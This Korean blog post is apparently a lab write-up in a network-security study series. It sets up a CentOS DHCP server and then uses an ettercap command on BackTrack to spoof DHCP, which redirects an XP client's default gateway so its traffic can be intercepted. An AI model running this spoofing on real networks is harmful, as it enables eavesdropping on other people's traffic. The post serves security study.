DHCP
CentOS vmnet8 (NAT) 세팅
 
[root@localhost ~]# dhclient
[root@localhost ~]# ifconfig

CentOS IP : 192.168.1.138

[root@localhost ~]# yum install dhcp-devel
[root@localhost ~]# rpm -qa | grep dhcp
패키지 설치 확인
[

root@localhost ~]# service dhcpd status


현재 서비스는 정지 되어 있다.
DHCP
D : Discover
O : Offer
R : Request
A : Ack

공격자의 IPDHCP서버로 속여 클라이언트의 게이트웨이를 공격자의 IP로 설정하여 클라이언트의 모든 트래픽을 볼 수 있다.
하지만 DHCP서버가 여러개일 경우 공격자의 offerDHCP서버의 offer보다 빨라야 하기 때문에 실행에 어려움이 따른다.

[root@localhost ~]# vi /etc/dhcp/dhcpd.conf //dhcp 설정 파일
 
/usr/share/doc/dhcp*/dhcpd.conf.sample //샘플파일을 복사해서 사용하는 것이 좋다.
[root@localhost ~]# cp /usr/share/doc/dhcp*/dhcpd.conf.sample /etc/dhcp/dhcpd.conf
cp: overwrite `/etc/dhcp/dhcpd.conf'? y
[root@localhost ~]# vi /etc/dhcp/dhcpd.conf //복사된 dhcp설정 파일 편집
 
IP Pool
어떤 IP를 할당해야할지를 결정하는 것
 
[root@localhost ~]# vi /etc/dhcp/dhcpd.conf
열고 9dd를 명령하여 9개줄을 지운다.
 
   5   ddns-update-style none; //주석 풀기
 
아래 내용만 남기고 다 날려도 된다.
   1   ddns-update-style none;
   2
   3
   4   subnet 10.5.5.0 netmask 255.255.255.224 {
   5   range 10.5.5.26 10.5.5.30;
   6    option domain-name-servers ns1.internal.example.org;
   7   option domain-name "internal.example.org";
   8    option routers 10.5.5.1;
   9   option broadcast-address 10.5.5.31;
   10    default-lease-time 600;
   11    max-lease-time 7200;
   12   }
 
 
아래와 같이 변경해 주고 wq로 저장하고 나온다
   1   ddns-update-style none;
   2
   3
   4   subnet 10.10.10.0 netmask 255.255.255.0 {
   5    range 10.10.10.10 10.10.10.30;
   6    option routers 10.10.10.254;
   7    option broadcast-address 10.10.10.255;
   8    option domain-name-servers 168.126.63.1;
   9    default-lease-time 600;
   10   max-lease-time 7200;
   11   }
 
 
 
 
[root@localhost ~]# ps -e | grep dh
10405 ? 00:00:00 dhclient

[root@localhost ~]# kill -9 10405
/*
지금 상태에서 서비스를 시작하면 자기 자신한테 IP를 자동으로 부여 하게 되므로
프로세스를 꺼준다.
*/
 
XP로 자동할당 되는지 확인

XP를 꺼준다

BackTrack설정
 
root@bt:~# ettercap -T -M dhcp:10.10.10.10-30/255.255.255.0/168.126.63.1
//BackTrackdhcp처럼 속이기위함
XP를 다시 켜준다.
 
성공한다면 XPDefault GatewayBackTrackIP로 바뀔 것임
실패한다면 CentOSdhcpd가 먼저 동작한 것임.

XP

Gateway가 BackTrack의  IP로 바뀐 것을 확인 할 수 있다.

'정보보안 > Network' 카테고리의 다른 글

DNS Spoofing,파밍  (383) 2020.08.02
DHCP Starvation 공격(DOS공격 중 하나)  (312) 2020.08.02
ARP Spoofing,Fowarding  (409) 2020.08.02
Active Sniffing  (344) 2020.08.02
네트워크 기본  (731) 2020.08.02

+ Recent posts